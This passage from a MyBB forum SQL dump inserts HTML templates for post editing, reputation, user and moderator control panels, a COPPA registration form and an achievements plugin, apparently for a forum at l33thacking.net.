tabindex=\"1\" /></td>\n</tr>\n{$posticons}\n<tr>\n<td class=\"trow2\" valign=\"top\"><strong>{$lang->your_message}:</strong><br /><div style=\"text-align: center;\">{$smilieinserter}</div></td>\n<td class=\"trow2\">\n<textarea name=\"message\" id=\"message\" rows=\"20\" cols=\"70\" tabindex=\"3\">{$message}</textarea>\n{$codebuttons}\n</td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\"><strong>{$lang->post_options}</strong></td>\n<td class=\"trow1\"><span class=\"smalltext\">\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[signature]\" value=\"1\" tabindex=\"6\"{$postoptionschecked[\'signature\']} /> {$lang->options_sig}</label>\n{$disablesmilies}</span>\n</td>\n</tr>\n{$subscriptionmethod}\n{$pollbox}{$editedby}\n</table>\n{$attachbox}\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_post}\" tabindex=\"3\" accesskey=\"s\" /> <input type=\"submit\" class=\"button\" name=\"previewpost\" value=\"{$lang->preview_post}\" tabindex=\"4\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_editpost\" />\n<input type=\"hidden\" name=\"posthash\" value=\"{$posthash}\" />\n<input type=\"hidden\" name=\"attachmentaid\" value=\"\" />\n<input type=\"hidden\" name=\"attachmentact\" value=\"\" />\n</form>\n{$footer}\n</body>\n</html>', '8', '1608', '', '1345767270'); INSERT INTO mybb_templates VALUES('2028', 'reputation_add', '<html>\r\n<head>\r\n<title>{$mybb->settings[\'bbname\']} - {$lang->reputation}</title>\r\n{$headerinclude}\r\n</head>\r\n<body>\r\n<br />\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n <tr>\r\n <td class=\"trow1\" style=\"padding: 20px\">\r\n <strong>{$vote_title}</strong><br />{$post_rep_info}<br />\r\n <form action=\"reputation.php\" method=\"post\">\r\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\r\n <input type=\"hidden\" name=\"action\" value=\"do_add\" />\r\n <input type=\"hidden\" name=\"uid\" value=\"{$user[\'uid\']}\" />\r\n <input type=\"hidden\" name=\"pid\" value=\"{$mybb->input[\'pid\']}\" />\r\n <input type=\"hidden\" name=\"rid\" value=\"{$rid}\" />\r\n <select name=\"reputation\" id=\"reputation\">\r\n {$positive_power}\r\n {$neutral_power}\r\n {$negative_power}\r\n </select>\r\n <br /><br />\r\n <span class=\"smalltext\">{$lang->user_comments}</span>\r\n <br />\r\n <input type=\"text\" class=\"textbox\" name=\"comments\" size=\"35\" maxlength=\"250\" value=\"{$comments}\" style=\"width: 95%\" />\r\n <br /><br />\r\n <div style=\"text-align: center;\">\r\n <input type=\"submit\" class=\"button\" value=\"{$vote_button}\" />\r\n {$delete_button}\r\n </div>\r\n </form>\r\n{$repfuckbutton}\r\n </div>\r\n </td>\r\n </tr>\r\n</table>\r\n</body>\r\n</html>', '8', '1608', '', '1346117746'); INSERT INTO mybb_templates VALUES('2034', 'member_profile_modoptions', '\n<br /><table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\" class=\"tborder\">\n<tr>\n<td colspan=\"2\" class=\"thead\"><strong>{$lang->mod_options}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">\n<ul>\n<li><a href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=editprofile&amp;uid={$uid}\">{$lang->edit_in_mcp}</a></li>\n<li><a href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=banuser&amp;uid={$uid}\">{$lang->ban_in_mcp}</a></li>\n</ul>\n</td>\n</tr>\n<tr>\n<td class=\"trow2\">\n{$memprofile[\'usernotes\']}<br />\n<a href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=editprofile&amp;uid={$uid}\">{$lang->edit_usernotes}</a>\n</td>\n</tr>\n{goodbyespammer}</table>\n', '8', '1608', '', '1346459787'); INSERT INTO mybb_templates VALUES('2041', 'usercp_nav_misc', '<tr>\n <td class=\"tcat\">\n <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'usercpmisc\']}.gif\" id=\"usercpmisc_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div>\n <div><span class=\"smalltext\"><strong>{$lang->ucp_nav_misc}</strong></span></div>\n </td>\n</tr>\n<tbody style=\"{$collapsed[\'usercpmisc_e\']}\" id=\"usercpmisc_e\">\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=usergroups\" class=\"usercp_nav_item usercp_nav_usergroups\">{$lang->ucp_nav_usergroups}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=editlists\" class=\"usercp_nav_item usercp_nav_editlists\">{$lang->ucp_nav_editlists}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=attachments\" class=\"usercp_nav_item usercp_nav_attachments\">{$lang->ucp_nav_attachments}</a></td></tr>\n <tr><td class=\"trow1 smalltext\">{$draftstart}<a href=\"usercp.php?action=drafts\" class=\"usercp_nav_item usercp_nav_drafts\">{$lang->ucp_nav_drafts} {$draftcount}</a>{$draftend}</td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=subscriptions\" class=\"usercp_nav_item usercp_nav_subscriptions\">{$lang->ucp_nav_subscribed_threads}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=forumsubscriptions\" class=\"usercp_nav_item usercp_nav_fsubscriptions\">{$lang->ucp_nav_forum_subscriptions}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"{$profile_link}\" class=\"usercp_nav_item usercp_nav_viewprofile\">{$lang->ucp_nav_view_profile}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"refer.php?action=invite\">Refer A Member</a></td></tbody>', '8', '1608', '', '1346459916'); INSERT INTO mybb_templates VALUES('2042', 'online_today_index', '<tr>\n <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->whos_online_today}</strong> [<a href=\"online.php?action=today\">{$lang->complete_list}</a>]</span></td>\n</tr>\n<tr>\n <td class=\"trow1\"><span class=\"smalltext\">{$lang->online_note_today}<br />{$onlinemembers}</span></td>\n</tr>', '-1', '0', '', '0'); INSERT INTO mybb_templates VALUES('2043', 'index_boardstats', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<thead>\n<tr>\n<td class=\"thead\">\n<div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'boardstats\']}.gif\" id=\"boardstats_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div>\n<div><strong>{$lang->boardstats}</strong></div>\n</td>\n</tr>\n</thead>\n<tbody style=\"{$collapsed[\'boardstats_e\']}\" id=\"boardstats_e\">\n{$whosonline}\n{$online_today}\n{$birthdays}\n{$forumstats}\n<tr>\n <td class=\"tfoot\" style=\"text-align: right\">\n <span class=\"smalltext\">\n {$logoutlink}\n <a href=\"misc.php?action=markread{$post_code_string}\">{$lang->markread}</a> |\n <a href=\"showteam.php\">{$lang->forumteam}</a> |\n <a href=\"stats.php\">{$lang->forumstats}</a>\n </span>\n </td>\n</tr>\n</tbody>\n</table>\n<br />', '1', '1608', '', '1346646704'); INSERT INTO mybb_templates VALUES('2045', 'index_boardstats', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<thead>\n<tr>\n<td class=\"thead\">\n<div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'boardstats\']}.gif\" id=\"boardstats_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div>\n<div><strong>{$lang->boardstats}</strong></div>\n</td>\n</tr>\n</thead>\n<tbody style=\"{$collapsed[\'boardstats_e\']}\" id=\"boardstats_e\">\n{$whosonline}\n{$online_today}\n{$birthdays}\n{$forumstats}\n<tr>\n <td class=\"tfoot\" style=\"text-align: right\">\n <span class=\"smalltext\">\n {$logoutlink}\n <a href=\"misc.php?action=markread{$post_code_string}\">{$lang->markread}</a> |\n <a href=\"showteam.php\">{$lang->forumteam}</a> |\n <a href=\"stats.php\">{$lang->forumstats}</a>\n </span>\n </td>\n</tr>\n</tbody>\n</table>\n<br />', '8', '1608', '', '1346646704'); INSERT INTO mybb_templates VALUES('2047', 'forumdisplay', '<html>\r\n<head>\r\n<title>{$mybb->settings[\'bbname\']} - {$foruminfo[\'name\']} {$google_seo_page} </title>\r\n{$headerinclude}\r\n{$rssdiscovery}\r\n<script type=\"text/javascript\">\r\n<!--\r\n lang.no_new_posts = \"{$lang->no_new_posts}\";\r\n lang.click_mark_read = \"{$lang->click_mark_read}\";\r\n// -->\r\n</script>\r\n</head>\r\n<body>\r\n{$header}\r\n{$moderatedby}\r\n{$usersbrowsing}\r\n{$rules}\r\n{$subforums}\r\n{$threadslist}\r\n{$footer}\r\n</body>\r\n</html>', '8', '1608', '', '1347136646'); INSERT INTO mybb_templates VALUES('2049', 'member_coppa_form', '<html>\r\n<head>\r\n <title>{$mybb->settings[\'bbname\']} - {$lang->coppa_compliance}</title>\r\n <style type=\"text/css\">\r\n body { font-family: Verdana, Arial, sans-serif; font-size: 13px; }\r\n .largetext, h1 { font-family: Verdana, Arial, sans-serif; font-size: medium; font-weight: bold; margin: 0; }\r\n .grey { color: #ccc; }\r\n dl { margin-left: 40px; }\r\n dt { width: 150px; float: left; clear: left; font-weight: bold; }\r\n dd { margin-bottom: 20px; margin-left: 150px; }\r\n dd.single { margin-left: 0; }\r\n input.textbox { border: 0; border-bottom: 1px solid #000; font-size: 16px; width: 350px; }\r\n input.date { width: 80px; }\r\n </style>\r\n</head>\r\n<body>\r\n <div style=\"float: right; text-align: center; padding-bottom: 10px;\" class=\"largetext\">\r\n {$mybb->settings[\'bbname\']}<br /><span class=\"grey\">{$lang->coppa_registration}</span>\r\n </div>\r\n <div style=\"padding-bottom: 10px;\"><a href=\"index.php\"><img src=\"{$theme[\'logo\']}\" alt=\"{$mybb->settings[\'bbname\']}\" border=\"0\" /></a></div>\r\n <hr size=\"1\" style=\"clear: both;\" />\r\n\r\n <p>Please have this agreement emailed to support@l33thacking.net with the title \"Coppa\". Thank you!</p>\r\n\r\n <dl>\r\n\r\n <dt>{$lang->mailing_address}</dt>\r\n <dd>{$mybb->settings[\'mailingaddress\']}</dd>\r\n </dl>\r\n\r\n <h1 style=\"clear: both;\" />{$lang->account_information}</h1>\r\n <dl>\r\n <dt><label for=\"username\">{$lang->username}</label></dt>\r\n <dd><input type=\"text\" class=\"textbox\" id=\"username\" /></dd>\r\n\r\n <dt><label for=\"email\">{$lang->email}</label></dt>\r\n <dd><input type=\"text\" class=\"textbox\" id=\"email\" /></dd>\r\n\r\n <dt><label for=\"username\">Desired Password:</label></dt>\r\n <dd><input type=\"text\" class=\"textbox\" id=\"password\" /></dd>\r\n </dl>\r\n <h1 style=\"clear: both;\" />{$lang->parent_details}</h1>\r\n <dl>\r\n <dt><label for=\"name\">{$lang->full_name}</label></dt>\r\n <dd><input type=\"text\" class=\"textbox\" id=\"name\" /></dd>\r\n\r\n <dt><label for=\"relation\">{$lang->relation}</label></dt>\r\n <dd><input type=\"text\" class=\"textbox\" id=\"relation\" /></dd>\r\n\r\n <dt><label for=\"phone\">{$lang->phone_no}</label></dt>\r\n <dd><input type=\"text\" class=\"textbox\" id=\"phone\" /></dd>\r\n\r\n <dt><label for=\"parent_email\">{$lang->email}</label></dt>\r\n <dd><input type=\"text\" class=\"textbox\" id=\"parent_email\" /></dd>\r\n\r\n <dd class=\"single\">{$lang->coppa_parent_agreement} Feel free to have a look at our legal policies/disclaimer <a href=\"http://l33thacking.net/misc.php?action=help&hid=16\">HERE</a></dd>\r\n\r\n <dt><label for=\"signature\">{$lang->signature}</label></dt>\r\n <dd><input type=\"text\" class=\"textbox\" id=\"signature\" /> Date: <input type=\"text\" class=\"textbox date\" id=\"date\" /></dd>\r\n </dl>\r\n</body>\r\n</html>', '8', '1608', '', '1347176017'); INSERT INTO mybb_templates VALUES('2050', 'reputation_edit', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->reputation}</title>\n{$headerinclude}\n</head>\n<body>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"trow1\" style=\"padding: 20px\">\n<strong>{$lang->edit_comment}</strong><br />\n<form action=\"reputation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"do_edit\" />\n<input type=\"hidden\" name=\"uid\" value=\"{$mybb->input[\'uid\']}\" />\n<input type=\"hidden\" name=\"rid\" value=\"{$mybb->input[\'rid\']}\" />\n<br /><br />\n<span class=\"smalltext\">{$lang->update_this_comment}</span>\n<br />\n<input type=\"text\" class=\"textbox\" name=\"comments\" size=\"35\" maxlength=\"350\" value=\"{$editrep[\'comments\']}\" style=\"width: 95%\" />\n<br /><br />\n<div style=\"text-align: center;\">\n<input type=\"submit\" class=\"button\" value=\"{$lang->update_comment}\" />\n</div>\n</form>\n</td>\n</tr>\n</table>\n</body>\n</html>', '-1', '', '', '1350352468'); INSERT INTO mybb_templates VALUES('2051', 'reputation_edit_error', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->reputation}</title>\n{$headerinclude}\n</head>\n<body>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"trow1\" style=\"padding: 20px\">\n<strong>{$lang->error}</strong><br /><br />\n<blockquote>{$message}</blockquote>\n<br /><br />\n<div style=\"text-align: center;\">\n<script type=\"text/javascript\">\n<!--\nvar showBack = {$show_back};\nif(showBack == 1)\n{\ndocument.write(\'[<a href=\"javascript:history.go(-1);\">{$lang->go_back}</a>]\');\n}\ndocument.write(\'[<a href=\"javascript:window.close();\">{$lang->close_window}</a>]\');\n// -->\n</script>\n</div>\n</td>\n</tr>\n</table>\n</body>\n</html>', '-1', '', '', '1350352468'); INSERT INTO mybb_templates VALUES('2052', 'reputation_vote', '<tr>\n <td class=\"trow1 {$status_class}\">\n {$reputation_vote[\'username\']} <span class=\"smalltext\">{$reputation_vote[\'user_reputation\']} - {$last_updated} <!-- editlink{$reputation_vote[\'rid\']} --> {$delete_link}<br />{$postrep_given}<br /></span>\n <strong class=\"{$vote_type_class}\">{$vote_type} {$vote_reputation}:</strong> {$reputation_vote[\'comments\']}\n </td>\n</tr>', '1', '1608', '', '1350352468'); INSERT INTO mybb_templates VALUES('2080', 'achivements_modcp_quit', '<html>\r\n<head>\r\n<title>{$mybb->settings[\'bbname\']} - {$lang->quitachivement}</title>\r\n{$headerinclude}\r\n</head>\r\n<body>\r\n{$header}\r\n<table width=\"100%\" border=\"0\" align=\"center\">\r\n<tr>\r\n{$modcp_nav}\r\n<td valign=\"top\">\r\n<form action=\"modcp.php?action=achivements\" method=\"post\">\r\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\r\n<input type=\"hidden\" name=\"mod\" value=\"{$mybb->input[\'mod\']}\" />\r\n<input type=\"hidden\" name=\"acid\" value=\"{$mybb->input[\'acid\']}\" />\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->quitcustom}</strong></td>\r\n</tr>\r\n<tr>\r\n<td class=\"trow1\"><strong>{$lang->user}</strong>:</td>\r\n<td class=\"trow2\"><input type=\"text\" class=\"textbox\" id=\"username\" name=\"username\" size=\"40\" maxlength=\"85\" tabindex=\"1\" /></td>\r\n</table>\r\n<br />\r\n<div style=\"text-align:center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->quitachivement}\"/></div>\r\n</form>\r\n</td>\r\n</tr>\r\n</table>\r\n{$footer}\r\n<script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script>\r\n<script type=\"text/javascript\">\r\n<!--\r\n if(use_xmlhttprequest == \"1\")\r\n {\r\n new autoComplete(\"username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"});\r\n }\r\n// -->\r\n</script>\r\n</body>\r\n</html>', '-1', '1604', '', '1350790438'); INSERT INTO mybb_templates VALUES('2081', 'achivements_modcp_nav', '<tr>\r\n<td class=\"trow1 smalltext\">\r\n<a href=\"modcp.php?action=achivements\" style=\"display: block;padding: 1px 0 1px 23px;background: url(inc/plugins/achivements/include/images/modcp.png) no-repeat left center;\">{$lang->custom_modules}</a></td>\r\n</tr>', '-1', '1604', '', '1350790438'); INSERT INTO mybb_templates VALUES('2082', 'achivements_modcp_list', '<tr>\r\n<td class=\"{$trow}\" align=\"center\"><img src=\"{$custom[\'image\']}\" title=\"{$custom[\'name\']}\" /></td>\r\n<td class=\"{$trow}\"><strong>{$custom[\'name\']}</strong><br /><span class=\"smalltext\">{$custom[\'reason\']}</span></td>\r\n<td class=\"{$trow}\" width=\"10%\" align=\"center\"><a href=\"modcp.php?action=achivements&mod=give&acid={$custom[\'acid\']}\" />{$lang->give}</a></td>\r\n<td class=\"{$trow}\" width=\"10%\" align=\"center\"><a href=\"modcp.php?action=achivements&mod=quit&acid={$custom[\'acid\']}\" />{$lang->quit}</a></td>\r\n</tr>', '-1', '1604', '', '1350790438'); INSERT INTO mybb_templates VALUES('2077', 'achivements_usercp_all', '<label for=\"{$logro[\'name\']}\"><input type=\"checkbox\" name=\"showachivement[]\" value=\"{$id}\" /> {$achivement}</label>', '-1', '1604', '', '1350790438'); INSERT INTO mybb_templates VALUES('2078', 'achivements_modcp', '<html>\r\n<head>\r\n<title>{$mybb->settings[\'bbname\']} - {$lang->achivements}</title>\r\n{$headerinclude}\r\n</head>\r\n<body>\r\n{$header}\r\n<table width=\"100%\" border=\"0\" align=\"center\">\r\n<tr>\r\n{$modcp_nav}\r\n<td valign=\"top\">\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\" colspan=\"4\"><strong>{$lang->custom_modules}</strong></td>\r\n</tr>\r\n<tr>\r\n<td class=\"tcat\" width=\"10%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->image}</strong></span>\r\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->namedescription}</strong></span>\r\n<td class=\"tcat\" width=\"20%\" align=\"center\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->option}</strong></span>\r\n</td>\r\n<tr>\r\n{$custom_achivements}\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n</table>\r\n{$footer}\r\n</body>\r\n</html>', '-1', '1604', '', '1350790438'); INSERT INTO mybb_templates VALUES('2079', 'achivements_modcp_give', '<html>\r\n<head>\r\n<title>{$mybb->settings[\'bbname\']} - {$lang->giveachivements}</title>\r\n{$headerinclude}\r\n</head>\r\n<body>\r\n{$header}\r\n<table width=\"100%\" border=\"0\" align=\"center\">\r\n<tr>\r\n{$modcp_nav}\r\n<td valign=\"top\">\r\n<form action=\"modcp.php?action=achivements\" method=\"post\">\r\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\r\n<input type=\"hidden\" name=\"mod\" value=\"{$mybb->input[\'mod\']}\" />\r\n<input type=\"hidden\" name=\"acid\" value=\"{$mybb->input[\'acid\']}\" />\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->giveuserform}</strong></td>\r\n</tr>\r\n<tr>\r\n<td class=\"trow1\"><strong>{$lang->user}</strong>:</td>\r\n<td class=\"trow2\"><input type=\"text\" class=\"textbox\" id=\"username\" name=\"username\" size=\"40\" maxlength=\"85\" tabindex=\"1\" /></td>\r\n</table>\r\n<br />\r\n<div style=\"text-align:center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->giveachivements}\"/></div>\r\n</form>\r\n</td>\r\n</tr>\r\n</table>\r\n{$footer}\r\n<script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script>\r\n<script type=\"text/javascript\">\r\n<!--\r\n if(use_xmlhttprequest == \"1\")\r\n {\r\n new autoComplete(\"username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"});\r\n }\r\n// -->\r\n</script>\r\n</body>\r\n</html>', '-1', '1604', '', '1350790438'); INSERT INTO mybb_templates VALUES('2074', 'achivements_profile', '<br />\r\n<table id=\"achivements\" border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\"><strong>{$lang->achsmemprofile}</strong></td>\r\n</tr>\r\n<tr>\r\n<td class=\"trow1\">\r\n{$achivements}\r\n</td>\r\n</tr>\r\n</table>', '-1', '1604', '', '1350790438'); INSERT INTO mybb_templates VALUES('2075', 'achivements_postbit', '{$lang->achivements}: {$achivements}', '-1', '1604', '', '1350790438'); INSERT INTO mybb_templates VALUES('2076', 'achivements_usercp', '<html>\r\n<head>\r\n<title>{$mybb->settings[\'bbname\']} - {$lang->achivements}</title>\r\n{$headerinclude}\r\n\r\n<script languaje=\"javascript\">\r\nfunction select_all_achivements(){\r\n for (i=0;i<document.achivements_form.elements.length;i++)\r\n if(document.achivements_form.elements[i].type == \"checkbox\")\r\n document.achivements_form.elements[i].checked=1\r\n}\r\nfunction unselect_all_achivements(){\r\n for (i=0;i<document.achivements_form.elements.length;i++)\r\n if(document.achivements_form.elements[i].type == \"checkbox\")\r\n document.achivements_form.elements[i].checked=0\r\n} \r\n</script>\r\n</head>\r\n<body>\r\n{$header}\r\n<form method=\"post\" name=\"achivements_form\" enctype=\"multipart/form-data\" action=\"usercp.php\">\r\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\r\n<table width=\"100%\" border=\"0\" align=\"center\">\r\n<tr>\r\n{$usercpnav}\r\n<td valign=\"top\">\r\n{$errors}\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\"><strong>{$lang->achivements}</strong></td>\r\n</tr>\r\n<tr>\r\n<td class=\"tcat\"><strong>{$lang->achivementscurrentprofile}</strong></td>\r\n</tr>\r\n<tr>\r\n<td class=\"trow1\">{$currentachivements}</td>\r\n</tr>\r\n<tr>\r\n<td class=\"tcat\"><strong>{$lang->achivementscurrentpostbit}</strong></td>\r\n</tr>\r\n<tr>\r\n<td class=\"trow1\">{$currentachivementspostbit}</td>\r\n</tr>\r\n<tr>\r\n<td class=\"tcat\"><strong>{$lang->myachivements}</strong></td>\r\n</tr>\r\n<tr>\r\n<td class=\"trow2\">\r\n<a href=\"javascript:select_all_achivements()\"><small>{$lang->markall}</small></a> |\r\n<a href=\"javascript:unselect_all_achivements()\"><small>{$lang->marknone}</small></a><br />\r\n{$achivements}</td>\r\n</tr>\r\n</table>\r\n<br />\r\n<div align=\"center\">\r\n<input type=\"hidden\" name=\"action\" value=\"do_achivements\" />\r\n<input type=\"submit\" class=\"button\" name=\"profile\" value=\"{$lang->showinprofile}\" />\r\n<input type=\"submit\" class=\"button\" name=\"postbit\" value=\"{$lang->showinpostbit}\" />\r\n</div>\r\n</td>\r\n</tr>\r\n</table>\r\n</form>\r\n{$footer}\r\n</body>\r\n</html>', '-1', '1604', '', '1350790438'); INSERT INTO mybb_templates VALUES('2072', 'achivements_empty', '<tr><td class=\"trow1\" colspan=\"4\" align=\"center\">{$lang->achiviementstableempty}</td></tr>', '-1', '1604', '', '1350790438'); INSERT INTO mybb_templates VALUES('2073', 'achivements_list', '<tr>\r\n<td class=\"{$color}\" width=\"10%\" align=\"center\"><img src=\"{$achivements[\'image\']}\" /></td>\r\n<td class=\"{$color}\" width=\"10%\" align=\"center\">{$value}</td>\r\n<td class=\"{$color}\" width=\"20%\">{$achivements[\'name\']}</td>\r\n<td class=\"{$color}\">{$achivements[\'description\']}</td>\r\n</tr>', '-1', '1604', '', '1350790438'); INSERT INTO mybb_templates VALUES('2067', 'usercp_nav_profile', '<tr>\n <td class=\"tcat\">\n <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'usercpprofile\']}.gif\" id=\"usercpprofile_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div>\n <div><span class=\"smalltext\"><strong>{$lang->ucp_nav_profile}</strong></span></div>\n </td>\n</tr>\n<tbody style=\"{$collapsed[\'usercpprofile_e\']}\" id=\"usercpprofile_e\">\n <tr><td class=\"trow1 smalltext\">\n <div><a href=\"usercp.php?action=profile\" class=\"usercp_nav_item usercp_nav_profile\">{$lang->ucp_nav_edit_profile}</a></div>\n {$changenameop}\n <div><a href=\"usercp.php?action=password\" class=\"usercp_nav_item usercp_nav_password\">{$lang->ucp_nav_change_pass}</a></div>\n <div><a href=\"usercp.php?action=email\" class=\"usercp_nav_item usercp_nav_email\">{$lang->ucp_nav_change_email}</a></div>\n <div><a href=\"usercp.php?action=avatar\" class=\"usercp_nav_item usercp_nav_avatar\">{$lang->ucp_nav_change_avatar}</a></div>\n {$changesigop}<!-- usercp_achivements --><div><a href=\"usercp.php?action=achivements\" class=\"usercp_nav_item\" style=\"padding-left: 40px;background: url(inc/plugins/achivements/include/images/achivements_usercp.png) no-repeat left center;\">Achivements</a></div><!-- /usercp_achivements -->\n </td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=options\" class=\"usercp_nav_item usercp_nav_options\">{$lang->ucp_nav_edit_options}</a></td></tr>\n</tbody>', '1', '1608', '', '1350764104'); INSERT INTO mybb_templates VALUES('2068', 'usercp_nav_profile', '<tr>\n <td class=\"tcat\">\n <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'usercpprofile\']}.gif\" id=\"usercpprofile_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div>\n <div><span class=\"smalltext\"><strong>{$lang->ucp_nav_profile}</strong></span></div>\n </td>\n</tr>\n<tbody style=\"{$collapsed[\'usercpprofile_e\']}\" id=\"usercpprofile_e\">\n <tr><td class=\"trow1 smalltext\">\n <div><a href=\"usercp.php?action=profile\" class=\"usercp_nav_item usercp_nav_profile\">{$lang->ucp_nav_edit_profile}</a></div>\n {$changenameop}\n <div><a href=\"usercp.php?action=password\" class=\"usercp_nav_item usercp_nav_password\">{$lang->ucp_nav_change_pass}</a></div>\n <div><a href=\"usercp.php?action=email\" class=\"usercp_nav_item usercp_nav_email\">{$lang->ucp_nav_change_email}</a></div>\n <div><a href=\"usercp.php?action=avatar\" class=\"usercp_nav_item usercp_nav_avatar\">{$lang->ucp_nav_change_avatar}</a></div>\n {$changesigop}<!-- usercp_achivements --><div><a href=\"usercp.php?action=achivements\" class=\"usercp_nav_item\" style=\"padding-left: 40px;background: url(inc/plugins/achivements/include/images/achivements_usercp.png) no-repeat left center;\">Achivements</a></div><!-- /usercp_achivements -->\n </td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=options\" class=\"usercp_nav_item usercp_nav_options\">{$lang->ucp_nav_edit_options}</a></td></tr>\n</tbody>', '8', '1608', '', '1350764104'); INSERT INTO mybb_templates VALUES('2069', 'modcp_nav', '<td width=\"{$lang->nav_width}\" valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\"><strong>{$lang->nav_menu}</strong></td>\n </tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php\" class=\"modcp_nav_item modcp_nav_home\">{$lang->mcp_nav_home}</a></td></tr>\n <tr>\n <td class=\"tcat\">\n <div class=\"float_right\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'modcpforums\']}.gif\" id=\"modcpforums_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div>\n <div><span class=\"smalltext\"><strong>{$lang->mcp_nav_forums}</strong></span></div>\n </td>\n </tr>\n <tbody style=\"{$collapsed[\'modcpforums_e\']}\" id=\"modcpforums_e\">\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=announcements\" class=\"modcp_nav_item modcp_nav_announcements\">{$lang->mcp_nav_announcements}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=modqueue\" class=\"modcp_nav_item modcp_nav_modqueue\">{$lang->mcp_nav_modqueue}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=reports\" class=\"modcp_nav_item modcp_nav_reports\">{$lang->mcp_nav_reported_posts}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=modlogs\" class=\"modcp_nav_item modcp_nav_modlogs\">{$lang->mcp_nav_modlogs}</a></td></tr>\n </tbody>\n <tr>\n <td class=\"tcat\">\n <div class=\"float_right\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'modcpusers\']}.gif\" 